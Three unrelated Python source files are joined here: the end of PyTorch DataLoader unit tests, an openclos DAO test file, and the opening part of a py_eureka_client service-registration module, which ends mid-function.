loader2_it = iter(DataLoader(self.dataset, num_workers=2))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
@unittest.skip("temporarily disable until flaky failures are fixed")
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
def test_timeout(self):
p = ErrorTrackingProcess(target=_test_timeout)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_worker_seed(self):
num_workers = 6
dataset = SynchronizedSeedDataset(num_workers, num_workers)
dataloader = DataLoader(dataset, batch_size=1, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_shuffle(self):
self._test_shuffle(DataLoader(self.dataset, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True))
def test_sequential_workers(self):
self._test_sequential(DataLoader(self.dataset, num_workers=4))
def test_sequential_batch_workers(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4))
def test_shuffle_workers(self):
self._test_shuffle(DataLoader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = []
for i in range(0, 100, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = DataLoader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 40)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = DataLoader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
def test_error(self):
self._test_error(DataLoader(ErrorDataset(100), batch_size=2, shuffle=True))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_error_workers(self):
self._test_error(DataLoader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_partial_workers(self):
"check that workers exit even if the iterator is not exhausted"
loader = iter(DataLoader(self.dataset, batch_size=2, num_workers=4, pin_memory=True))
workers = loader.workers
worker_manager_thread = loader.worker_manager_thread
for i, sample in enumerate(loader):
if i == 3:
break
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
self.assertEqual(w.exitcode, 0)
worker_manager_thread.join(JOIN_TIMEOUT)
self.assertFalse(worker_manager_thread.is_alive())
@staticmethod
def _manager_process(dataset, worker_pids, manager_exit_event):
loader = iter(DataLoader(dataset, batch_size=2, num_workers=4, pin_memory=True))
workers = loader.workers
for i in range(len(workers)):
worker_pids[i] = int(workers[i].pid)
for i, sample in enumerate(loader):
if i == 3:
break
# Simulate a dirty exit of the manager process
manager_exit_event.set()
if IS_WINDOWS:
os.system('taskkill /PID ' + str(os.getpid()) + ' /F')
else:
os.kill(os.getpid(), signal.SIGKILL)
@staticmethod
def _is_process_alive(pid, pname):
# There is a chance of a terminated child process's pid being reused by a new unrelated process,
# but since we are looping this check very frequently, we will know that the child process has died
# before the new unrelated process starts.
if IS_WINDOWS:
command = 'tasklist | find "{}" /i'.format(pid)
else:
command = 'ps -p {} -o comm='.format(pid)
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
output = output.decode('utf-8')
return pname in output
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(sys.version_info[0] == 2,
"spawn start method is not supported in Python 2, \
but we need it for creating another process with CUDA")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_main_process_unclean_exit(self):
'''There might be ConnectionResetError or leaked semaphore warning (due to dirty process exit), \
but they are all safe to ignore'''
worker_pids = mp.Array('i', [0] * 4)
manager_exit_event = mp.Event()
p = mp.Process(target=TestDataLoader._manager_process,
args=(self.dataset, worker_pids, manager_exit_event))
p.start()
manager_exit_event.wait()
exit_status = [False] * len(worker_pids)
start_time = time.time()
pname = 'python'
while True:
for i in range(len(worker_pids)):
pid = worker_pids[i]
if not exit_status[i]:
if not TestDataLoader._is_process_alive(pid, pname):
exit_status[i] = True
if all(exit_status):
break
else:
time.sleep(1)
self.assertFalse(time.time() - start_time > MANAGER_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT,
'subprocess not terminated')
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for sample in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(DataLoader(self.dataset, batch_size=2), 50)
check_len(DataLoader(self.dataset, batch_size=3), 34)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = DataLoader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
default_collate(arr)
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: default_collate(arr))
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
class TestStringDataLoader(TestCase):
def setUp(self):
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for batch_ndx, (s, n) in enumerate(loader):
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.Tensor(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
class TestDictDataLoader(TestCase):
def setUp(self):
self.dataset = DictDataset()
def test_sequential_batch(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=False)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for batch_ndx, sample in enumerate(loader):
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
self.dataset = TestWorkerQueueDataset([i for i in range(128)])
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), [j for j in range(i * batch_size, (i + 1) * batch_size)])
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_ind_worker_queue(self):
for batch_size in (8, 16, 32, 64):
for num_workers in range(1, 6):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers)
if __name__ == '__main__':
run_tests()
|
test_dao.py
|
'''
Created on Aug 26, 2014
@author: moloyc
'''
import unittest
from sqlalchemy import exc
from flexmock import flexmock
import jnpr.openclos.util
from jnpr.openclos.model import Pod, Device, Interface, InterfaceDefinition, TrapGroup
from jnpr.openclos.dao import AbstractDao
from jnpr.openclos.exception import InvalidConfiguration
class TestAbstractDao(unittest.TestCase):
def testInit(self):
with self.assertRaises(NotImplementedError):
AbstractDao()
class InMemoryDao(AbstractDao):
def _getDbUrl(self):
jnpr.openclos.propLoader.loadLoggingConfig(appName = 'unittest')
return 'sqlite:///'
class TestDao(unittest.TestCase):
def setUp(self):
self.__dao = InMemoryDao.getInstance()
def tearDown(self):
InMemoryDao._destroy()
def testInvalidConfig(self):
class BadDao(AbstractDao):
def _getDbUrl(self):
return 'unknown://'
with self.assertRaises(InvalidConfiguration):
BadDao()
def testCreateObjects(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
ifd1 = InterfaceDefinition('ifd1', device, 'downlink')
ifd2 = InterfaceDefinition('ifd2', device, 'downlink')
ifd3 = InterfaceDefinition('ifd3', device, 'downlink')
ifd4 = InterfaceDefinition('ifd4', device, 'downlink')
self.__dao.createObjects(session, [ifd1, ifd2, ifd3, ifd4])
with self.__dao.getReadSession() as session:
self.assertEqual(4, len(self.__dao.getAll(session, InterfaceDefinition)))
self.assertEqual(1, len(self.__dao.getObjectsByName(session, InterfaceDefinition, 'ifd1')))
self.assertEqual(1, len(self.__dao.getObjectsByName(session, InterfaceDefinition, 'ifd2')))
def testDeleteNonExistingPod(self):
dict = {'devicePassword': 'test'}
pod = Pod('unknown', dict)
with self.assertRaises(exc.InvalidRequestError):
with self.__dao.getReadWriteSession() as session:
self.__dao.deleteObject(session, pod)
def testCascadeDeletePodDevice(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
self.assertEqual(1, len(self.__dao.getAll(session, Device)))
self.__dao.deleteObject(session, device.pod)
with self.__dao.getReadSession() as session:
self.assertEqual(0, len(self.__dao.getAll(session, Pod)))
self.assertEqual(0, len(self.__dao.getAll(session, Device)))
def testCascadeDeletePodDeviceInterface(self):
from test_model import createInterface
with self.__dao.getReadWriteSession() as session:
interface = createInterface(session, "test")
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
self.assertEqual(1, len(self.__dao.getAll(session, Device)))
self.assertEqual(1, len(self.__dao.getAll(session, Interface)))
self.__dao.deleteObject(session, interface.device.pod)
with self.__dao.getReadSession() as session:
self.assertEqual(0, len(self.__dao.getAll(session, Pod)))
self.assertEqual(0, len(self.__dao.getAll(session, Device)))
self.assertEqual(0, len(self.__dao.getAll(session, Interface)))
def testGetObjectById(self):
from test_model import createPod
with self.__dao.getReadWriteSession() as session:
pod = createPod("test", session)
with self.__dao.getReadSession() as session:
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
def testGetConnectedInterconnectIFDsFilterFakeOnes(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
fakeSession = flexmock(session)
fakeSession.should_receive('query.filter.filter.filter.order_by.all').\
and_return([InterfaceDefinition("et-0/1/0", None, 'uplink'), InterfaceDefinition("et-0/1/1", None, 'uplink'),
InterfaceDefinition("uplink-2", None, 'uplink'), InterfaceDefinition("uplink-3", None, 'uplink')])
filteredIfds = self.__dao.getConnectedInterconnectIFDsFilterFakeOnes(fakeSession, device)
self.assertEqual(2, len(filteredIfds))
@unittest.skip('manual test')
def testConnectionCleanup(self):
import threading
import time
class MySqlDao(AbstractDao):
def _getDbUrl(self):
jnpr.openclos.propLoader.loadLoggingConfig(appName = 'unittest')
return 'mysql://root:<password>@localhost/openclos'
dao = MySqlDao.getInstance()
def getPods():
with dao.getReadWriteSession() as session:
return dao.getAll(session, Pod)
threads = []
for i in xrange(10):
threads.append(threading.Thread(target = getPods))
threads[i].start()
for thread in threads:
thread.join()
print 'done 10 threads'
time.sleep(40)
threads = []
for i in xrange(10):
threads.append(threading.Thread(target = getPods))
threads[i].start()
for thread in threads:
thread.join()
print 'done 10 threads'
time.sleep(40)
MySqlDao._destroy()
print 'done final __dao destroy'
time.sleep(30)
|
eureka_client.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import atexit
import json
import re
import socket
import time
import ssl
import random
import inspect
from copy import copy
from typing import Callable, Dict, List, Union
import xml.etree.ElementTree as ElementTree
from threading import Timer, RLock, Thread
from urllib.parse import quote
import py_eureka_client.http_client as http_client
import py_eureka_client.netint_utils as netint
from py_eureka_client.logger import get_logger
from py_eureka_client.__dns_txt_resolver import get_txt_dns_record
from py_eureka_client.__aws_info_loader import AmazonInfo
_logger = get_logger("eureka_client")
"""
Status of instances
"""
INSTANCE_STATUS_UP: str = "UP"
INSTANCE_STATUS_DOWN: str = "DOWN"
INSTANCE_STATUS_STARTING: str = "STARTING"
INSTANCE_STATUS_OUT_OF_SERVICE: str = "OUT_OF_SERVICE"
INSTANCE_STATUS_UNKNOWN: str = "UNKNOWN"
"""
Action type of instances
"""
ACTION_TYPE_ADDED: str = "ADDED"
ACTION_TYPE_MODIFIED: str = "MODIFIED"
ACTION_TYPE_DELETED: str = "DELETED"
"""
This is for the DiscoveryClient. When this strategy is set, get_service_url will randomly choose one of the UP instances and return its url.
This is the default strategy.
"""
HA_STRATEGY_RANDOM: int = 1
"""
This is for the DiscoveryClient. When this strategy is set, get_service_url will stick to one instance and keep returning it until that instance goes down.
"""
HA_STRATEGY_STICK: int = 2
"""
This is for the DiscoveryClient. When this strategy is set, get_service_url will always return an instance different from the last one returned, as long as other instances are up.
"""
HA_STRATEGY_OTHER: int = 3
"""
The error types that will be sent back to the on_error callback function
"""
ERROR_REGISTER: str = "EUREKA_ERROR_REGISTER"
ERROR_DISCOVER: str = "EUREKA_ERROR_DISCOVER"
ERROR_STATUS_UPDATE: str = "EUREKA_ERROR_STATUS_UPDATE"
"""
The timeout, in seconds, for all HTTP requests to the Eureka server
"""
_DEFAULT_TIME_OUT = 5
"""
Default eureka server url.
"""
_DEFAULT_EUREKA_SERVER_URL = "http://127.0.0.1:8761/eureka/"
"""
Default instance field values
"""
_DEFAULT_INSTNACE_PORT = 9090
_DEFAULT_INSTNACE_SECURE_PORT = 9443
_RENEWAL_INTERVAL_IN_SECS = 30
_DURATION_IN_SECS = 90
_DEFAULT_DATA_CENTER_INFO = "MyOwn"
_DEFAULT_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo"
_AMAZON_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.AmazonInfo"
"""
Default configurations
"""
_DEFAULT_ENCODING = "utf-8"
_DEFAUTL_ZONE = "default"
### =========================> Base Methods <======================================== ###
### Beans ###
class LeaseInfo:
def __init__(self,
renewalIntervalInSecs: int = _RENEWAL_INTERVAL_IN_SECS,
durationInSecs: int = _DURATION_IN_SECS,
registrationTimestamp: int = 0,
lastRenewalTimestamp: int = 0,
renewalTimestamp: int = 0,
evictionTimestamp: int = 0,
serviceUpTimestamp: int = 0):
self.renewalIntervalInSecs: int = renewalIntervalInSecs
self.durationInSecs: int = durationInSecs
self.registrationTimestamp: int = registrationTimestamp
self.lastRenewalTimestamp: int = lastRenewalTimestamp
self.renewalTimestamp: int = renewalTimestamp
self.evictionTimestamp: int = evictionTimestamp
self.serviceUpTimestamp: int = serviceUpTimestamp
class DataCenterInfo:
def __init__(self,
name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
className=_DEFAULT_DATA_CENTER_INFO_CLASS,
metadata={}):
self.name: str = name
self.className: str = className
self.metadata: Dict = metadata if metadata else {}
class PortWrapper:
def __init__(self, port=0, enabled=False):
self.port: int = port
self.enabled: bool = enabled
class Instance:
def __init__(self,
instanceId="",
sid="", # @deprecated
app="",
appGroupName="",
ipAddr="",
port=PortWrapper(port=_DEFAULT_INSTNACE_PORT, enabled=True),
securePort=PortWrapper(port=_DEFAULT_INSTNACE_SECURE_PORT, enabled=False),
homePageUrl="",
statusPageUrl="",
healthCheckUrl="",
secureHealthCheckUrl="",
vipAddress="",
secureVipAddress="",
countryId=1,
dataCenterInfo=DataCenterInfo(),
hostName="",
status="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
overriddenstatus="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
leaseInfo=LeaseInfo(),
isCoordinatingDiscoveryServer=False,
metadata=None,
lastUpdatedTimestamp=0,
lastDirtyTimestamp=0,
actionType=ACTION_TYPE_ADDED, # ADDED, MODIFIED, DELETED
asgName=""):
self.__instanceId: str = instanceId
self.sid: str = sid
self.app: str = app
self.appGroupName: str = appGroupName
self.ipAddr: str = ipAddr
self.port: PortWrapper = port
self.securePort: PortWrapper = securePort
self.homePageUrl: str = homePageUrl
self.statusPageUrl: str = statusPageUrl
self.healthCheckUrl: str = healthCheckUrl
self.secureHealthCheckUrl: str = secureHealthCheckUrl
self.vipAddress: str = vipAddress
self.secureVipAddress: str = secureVipAddress
self.countryId: int = countryId
self.dataCenterInfo: DataCenterInfo = dataCenterInfo
self.hostName: str = hostName
self.status: str = status
self.overriddenstatus: str = overriddenstatus
self.leaseInfo: LeaseInfo = leaseInfo
self.isCoordinatingDiscoveryServer: bool = isCoordinatingDiscoveryServer
self.metadata: Dict = metadata if metadata is not None else {}
self.lastUpdatedTimestamp: int = lastUpdatedTimestamp
self.lastDirtyTimestamp: int = lastDirtyTimestamp
self.actionType: str = actionType
self.asgName: str = asgName
@property
def instanceId(self):
return self.__instanceId if self.__instanceId else f"{self.hostName}:{self.ipAddr}:{self.app}:{self.port.port if self.port else 0}"
@instanceId.setter
def instanceId(self, id):
self.__instanceId = id
@property
def zone(self) -> str:
if self.dataCenterInfo and self.dataCenterInfo.name == "Amazon" \
and self.dataCenterInfo.metadata and "availability-zone" in self.dataCenterInfo.metadata:
return self.dataCenterInfo.metadata["availability-zone"]
if self.metadata and "zone" in self.metadata and self.metadata["zone"]:
return self.metadata["zone"]
else:
return _DEFAUTL_ZONE
class Application:
def __init__(self,
name="",
instances=None):
self.name: str = name
self.__instances_dict = {}
self.__inst_lock = RLock()
if isinstance(instances, list):
for ins in instances:
self.add_instance(ins)
@property
def instances(self) -> List[Instance]:
with self.__inst_lock:
return list(self.__instances_dict.values())
@property
def up_instances(self) -> List[Instance]:
with self.__inst_lock:
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP]
def get_instance(self, instance_id: str) -> Instance:
with self.__inst_lock:
if instance_id in self.__instances_dict:
return self.__instances_dict[instance_id]
else:
return None
def add_instance(self, instance: Instance) -> None:
with self.__inst_lock:
self.__instances_dict[instance.instanceId] = instance
def update_instance(self, instance: Instance) -> None:
with self.__inst_lock:
_logger.debug(f"update instance {instance.instanceId}")
self.__instances_dict[instance.instanceId] = instance
def remove_instance(self, instance: Instance) -> None:
with self.__inst_lock:
if instance.instanceId in self.__instances_dict:
del self.__instances_dict[instance.instanceId]
def up_instances_in_zone(self, zone: str) -> List[Instance]:
with self.__inst_lock:
_zone = zone if zone else _DEFAUTL_ZONE
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP and item.zone == _zone]
def up_instances_not_in_zone(self, zone: str) -> List[Instance]:
with self.__inst_lock:
_zone = zone if zone else _DEFAUTL_ZONE
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP and item.zone != _zone]
class Applications:
def __init__(self,
apps__hashcode="",
versions__delta="",
applications=None):
self.apps__hashcode: str = apps__hashcode
self.versions__delta: str = versions__delta
self.__applications = applications if applications is not None else []
self.__application_name_dic = {}
self.__app_lock = RLock()
@property
def appsHashcode(self) -> str:
return self.apps__hashcode
@property
def applications(self) -> List[Application]:
return self.__applications
@property
def versionsDelta(self) -> str:
return self.versions__delta
def add_application(self, application: Application) -> None:
with self.__app_lock:
self.__applications.append(application)
self.__application_name_dic[application.name] = application
def get_application(self, app_name: str = "") -> Application:
with self.__app_lock:
aname = app_name.upper()
if aname in self.__application_name_dic:
return self.__application_name_dic[aname]
else:
return Application(name=aname)
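# Illustrative discovery sketch (the server URL and application name are hypothetical):
# pick a random UP instance of an application, mirroring HA_STRATEGY_RANDOM.
#
#   apps = get_applications("http://127.0.0.1:8761/eureka/")
#   app = apps.get_application("MY-SERVICE")
#   instance = random.choice(app.up_instances)
#   base_url = f"http://{instance.ipAddr}:{instance.port.port}/"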
########################## Basic functions #################################
####### Registry functions #########
def register(eureka_server: str, instance: Instance) -> None:
instance_dic = {
'instanceId': instance.instanceId,
'hostName': instance.hostName,
'app': instance.app,
'ipAddr': instance.ipAddr,
'status': instance.status,
'overriddenstatus': instance.overriddenstatus,
'port': {
'$': instance.port.port,
'@enabled': str(instance.port.enabled).lower()
},
'securePort': {
'$': instance.securePort.port,
'@enabled': str(instance.securePort.enabled).lower()
},
'countryId': instance.countryId,
'dataCenterInfo': {
'@class': instance.dataCenterInfo.className,
'name': instance.dataCenterInfo.name
},
'leaseInfo': {
'renewalIntervalInSecs': instance.leaseInfo.renewalIntervalInSecs,
'durationInSecs': instance.leaseInfo.durationInSecs,
'registrationTimestamp': instance.leaseInfo.registrationTimestamp,
'lastRenewalTimestamp': instance.leaseInfo.lastRenewalTimestamp,
'evictionTimestamp': instance.leaseInfo.evictionTimestamp,
'serviceUpTimestamp': instance.leaseInfo.serviceUpTimestamp
},
'metadata': instance.metadata,
'homePageUrl': instance.homePageUrl,
'statusPageUrl': instance.statusPageUrl,
'healthCheckUrl': instance.healthCheckUrl,
'secureHealthCheckUrl': instance.secureHealthCheckUrl,
'vipAddress': instance.vipAddress,
'secureVipAddress': instance.secureVipAddress,
'lastUpdatedTimestamp': str(instance.lastUpdatedTimestamp),
'lastDirtyTimestamp': str(instance.lastDirtyTimestamp),
'isCoordinatingDiscoveryServer': str(instance.isCoordinatingDiscoveryServer).lower()
}
if instance.dataCenterInfo.metadata:
instance_dic["dataCenterInfo"]["metadata"] = instance.dataCenterInfo.metadata
_register(eureka_server, instance_dic)
def _register(eureka_server: str, instance_dic: Dict) -> None:
req = http_client.Request(f"{_format_url(eureka_server)}apps/{quote(instance_dic['app'])}", method="POST")
req.add_header('Content-Type', 'application/json')
http_client.load(req, json.dumps({"instance": instance_dic}).encode(_DEFAULT_ENCODING), timeout=_DEFAULT_TIME_OUT)[0]
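# Minimal registration sketch (illustrative; the server URL, application name,
# address and port are hypothetical):
#
#   instance = Instance(app="MY-SERVICE",
#                       ipAddr="192.168.1.10",
#                       hostName="my-host",
#                       port=PortWrapper(port=8080, enabled=True),
#                       status=INSTANCE_STATUS_UP)
#   register("http://127.0.0.1:8761/eureka/", instance)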
def cancel(eureka_server: str, app_name: str, instance_id: str) -> None:
req = http_client.Request(f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}", method="DELETE")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def send_heartbeat(eureka_server: str,
app_name: str,
instance_id: str,
last_dirty_timestamp: int,
status: str = INSTANCE_STATUS_UP,
overriddenstatus: str = "") -> None:
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}?status={status}&lastDirtyTimestamp={last_dirty_timestamp}"
if overriddenstatus != "":
url += f"&overriddenstatus={overriddenstatus}"
req = http_client.Request(url, method="PUT")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def status_update(eureka_server: str,
app_name: str,
instance_id: str,
last_dirty_timestamp,
status: str = INSTANCE_STATUS_OUT_OF_SERVICE,
overriddenstatus: str = ""):
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}/status?value={status}&lastDirtyTimestamp={last_dirty_timestamp}"
if overriddenstatus != "":
url += f"&overriddenstatus={overriddenstatus}"
req = http_client.Request(url, method="PUT")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def delete_status_override(eureka_server: str, app_name: str, instance_id: str, last_dirty_timestamp: str):
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}/status?lastDirtyTimestamp={last_dirty_timestamp}"
req = http_client.Request(url, method="DELETE")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
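# The registry helpers above wrap the Eureka REST operations: registration is a
# POST to apps/{APP_NAME}, de-registration a DELETE on apps/{APP_NAME}/{INSTANCE_ID},
# the heartbeat a PUT on the same resource, and status changes use its /status
# sub-resource. A minimal, illustrative round-trip (the server url and the
# pre-populated Instance below are assumptions, not values taken from this module):
#
#   inst = Instance()   # assume app, instanceId, port, leaseInfo etc. are filled in
#   register("http://localhost:8761/eureka/", inst)
#   send_heartbeat("http://localhost:8761/eureka/", inst.app, inst.instanceId, inst.lastDirtyTimestamp)
#   cancel("http://localhost:8761/eureka/", inst.app, inst.instanceId)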
####### Discovery functions ########
def get_applications(eureka_server: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}apps/", regions)
def _format_url(url):
if url.endswith('/'):
return url
else:
return url + "/"
def _get_applications_(url, regions=[]):
_url = url
if len(regions) > 0:
_url = _url + ("&" if "?" in _url else "?") + "regions=" + (",".join(regions))
txt = http_client.load(_url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_applications(ElementTree.fromstring(txt.encode(_DEFAULT_ENCODING)))
def _build_applications(xml_node):
if xml_node.tag != "applications":
return None
applications = Applications()
for child_node in list(xml_node):
if child_node.tag == "versions__delta" and child_node.text is not None:
applications.versions__delta = child_node.text
elif child_node.tag == "apps__hashcode" and child_node.text is not None:
applications.apps__hashcode = child_node.text
elif child_node.tag == "application":
